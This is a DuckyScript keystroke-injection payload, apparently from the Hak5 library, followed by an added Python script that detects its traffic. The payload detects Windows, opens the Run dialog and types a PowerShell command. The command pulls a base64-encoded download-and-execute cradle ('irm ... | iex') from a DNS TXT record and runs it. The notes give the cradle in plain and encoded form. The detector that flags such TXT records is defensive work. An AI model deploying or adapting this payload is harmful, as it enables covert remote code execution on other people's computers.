Path: blob/master/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

REM Poll until the host answers the lock-LED report (passive "detect ready"),
REM or until #MAX_WAIT * #CHECK_INTERVAL ms have elapsed.
VAR $MAX_TRIES = #MAX_WAIT
WHILE (($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
    DELAY #CHECK_INTERVAL
    $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM Windows hosts issue more than #WINDOWS_HOST_REQUEST_COUNT configuration requests during enumeration.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
    $_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
    STRING HELLO WINDOWS!
ELSE
    STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

REM_BLOCK
Title: DNS-TXT-CommandInjection
CONFIGURATION
REQUIRED - Provide the URL used for #MY_TARGET_URL (example value: example.com)
NOTES: The base64 step is optional. To skip it, replace "$a=" and ";powershell -e $a" in the STRINGLN line below
with just "|iex", and store the decoded command in the TXT record instead.
Examples of the decoded command and of the encoded (UTF-16LE base64) form to place in the DNS TXT record are shown below;
the encoded example corresponds to the default example.com.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
Create the TXT record in AWS Route 53:
https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method
END_REM

DEFINE #MY_TARGET_URL example.com
GUI r
DELAY 500
STRINGLN powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a
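From the defender's side, the observable artefact of this payload is a DNS TXT answer that carries a PowerShell download cradle, either in the clear or as the UTF-16LE base64 that powershell -e expects. The following script is an added example, not part of the payload or the Hak5 payload library: it takes TXT record strings (as a DNS resolver log or passive-DNS feed would provide them), attempts the same decoding that powershell -e performs, and flags records containing cradle keywords. The indicator list and the sample records are constructed for the example; the encoded sample is the one shown in the payload notes above.

```python
import base64
import re

# Keywords typical of PowerShell download-and-execute one-liners (constructed indicator list).
CRADLE_PATTERNS = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE,
)

# Constructed sample TXT records: the payload's own encoded example, a plain-text cradle,
# a benign SPF record and a benign base64 token that is not UTF-16LE PowerShell.
SAMPLE_TXT_RECORDS = [
    "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==",
    "irm http://example.com/T1.txt | iex",
    "v=spf1 include:_spf.example.com ~all",
    "aGVsbG8gd29ybGQ=",
]


def decode_powershell_b64(value):
    """Decode a string the way `powershell -e` would: base64 wrapping UTF-16LE text.

    Returns the decoded command, or None if the string is not a plausible encoded command
    (wrong alphabet, odd byte count, non-ASCII or non-printable result).
    """
    value = value.strip()
    if len(value) < 8 or len(value) % 4 != 0:
        return None
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("utf-16-le")  # raises on an odd byte count
    except (ValueError, UnicodeDecodeError):
        return None
    if not (text.isascii() and text.isprintable()):
        return None
    return text


def inspect_txt_record(record):
    """Inspect one TXT record string and report whether it looks like a PowerShell cradle."""
    result = {
        "record": record,
        "encoded": False,
        "decoded": None,
        "indicators": [],
        "suspicious": False,
    }
    decoded = decode_powershell_b64(record)
    if decoded is not None:
        result["encoded"] = True
        result["decoded"] = decoded
    # Match keywords against the decoded command if there is one, else the raw record
    # (covers the "|iex" variant where no base64 is used).
    text = decoded if decoded is not None else record
    hits = sorted({m.lower() for m in CRADLE_PATTERNS.findall(text)})
    result["indicators"] = hits
    result["suspicious"] = bool(hits)
    return result


def scan_txt_records(records):
    """Return the inspection results for every record that was flagged as suspicious."""
    return [r for r in (inspect_txt_record(rec) for rec in records) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan_txt_records(SAMPLE_TXT_RECORDS):
        form = "base64/UTF-16LE" if hit["encoded"] else "plain"
        print(f"[{form}] indicators={hit['indicators']} command={hit['decoded'] or hit['record']!r}")
```

The decode step deliberately mirrors the interpreter's own rules (multiple-of-4 length, strict alphabet, even byte count, ASCII result) so that SPF, DKIM and site-verification tokens are not decoded into noise; only records that both decode cleanly and contain a cradle keyword are reported. In practice the same logic sits over the resolver's query log or a passive-DNS feed, and the TXT lookup itself, issued by powershell.exe shortly after a new HID device enumerates, is the correlation point for endpoint telemetry.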